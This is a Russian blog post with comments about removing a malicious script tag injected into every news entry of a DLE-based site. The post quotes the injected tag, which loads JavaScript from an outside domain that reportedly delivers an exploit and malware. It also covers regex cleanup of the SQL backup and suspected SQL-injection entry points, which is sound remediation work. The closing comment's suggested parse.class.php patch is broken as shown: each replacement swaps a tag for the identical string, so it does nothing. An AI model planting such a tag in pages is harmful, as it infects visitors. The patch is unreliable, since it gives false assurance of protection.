Что за сайт idealvk.msk.ru? Зайдя на 1 из сайтов клиента, обнаружил, что Firefox пытается ограничить доступ к сайту, т.к. считает его небезопасным и распространяющим вредоносные программы.
Полез в исходники и нашел после текста каждой новости вот такой вот текст
<script src=”https://idealvk.msk.ru/bbab3ab7bf8ddf63a07cc51429f2e306.js” type=”text/javascript”></script>
Какой-то козёл взломал сайт или соседний сайт на аккаунте и поправил в таблице текст всех новостей, добавив к ним этот код. Код кстати этот вызывает эксплойт и пытается загружать на компьютер вирусы. Дорогой кулхацкер — я желаю тебе всяческих болезней и недугов.
Вернемся к делу.
Сделал бекап SQL базы. Запрос с бекапом нужной таблица загнал в Notepad++ и попытался с помощью регулярного выражения удалить сей текст, чтобы загрузить чистую таблицу на сайт.
<script src=”https://idealvk.msk.ru/.*.js” type=”text/javascript”></script>
Однако, при выполнении бекапа MySQL выдал мне ошибку содержимого. Оказалось в таблице был столбец fullstory и shortstory, в которых соответственно хранились полная и краткая новости. А регулярное выражение сработало не так, ибо было неверно сконфигурировано. Удалилось всё от <script src=”https://idealvk.msk.ru/ в первой таблице и до ” type=”text/javascript”></script> во второй. =) Тоесть запрос шел до последних кавычек в строке.
Естественно вместо 2 столбцов получили 1 и не тот, что нужно.
После некоторых ковыряний в интернете собралось другое регулярное выражение
<script src=”[^”]*” type=”text/javascript”></script>
Вот оно то и сработало до первой кавычки и все правильно удалило. Загрузил чистую таблицу и принялся искать как гады добрались до таблицы.
Ну что нашел как он проник на сайт? У меня та же беда на DLE, никак не могу найти. Он еще и комп заразил бынером-винлокером. Подозрение на sql инъекцию, была недостаточная фильтрация в форме заявки с сайта. Сейчас устранил посмотрим что дальше. Также модуль Переходы таже проблема была с плохой фильтрацией запросов. Я смотрю у многих через Переходы заражает.
Если кто-то знает как залепить дыру через которую совершили это злодейство, сообщите. Столкнулся с подобной проблемой и я
Совет помог, только для notepad++ советую использовать вот такое выражение “”
удалось найти лазейку через которую это всё сделано? я просто тоже на всех дле сайтах обнаружил эту гадость
сижу руками вычищаю но постов море.. надо скрипт и желательно чтобы больше такого не повторялось
Откройте engine/classes/parse.class.php
Ниже добавьте:
$source = preg_replace( “#<iframe#i", "<iframe", $source );
$source = preg_replace( "#<script#i", "<script", $source );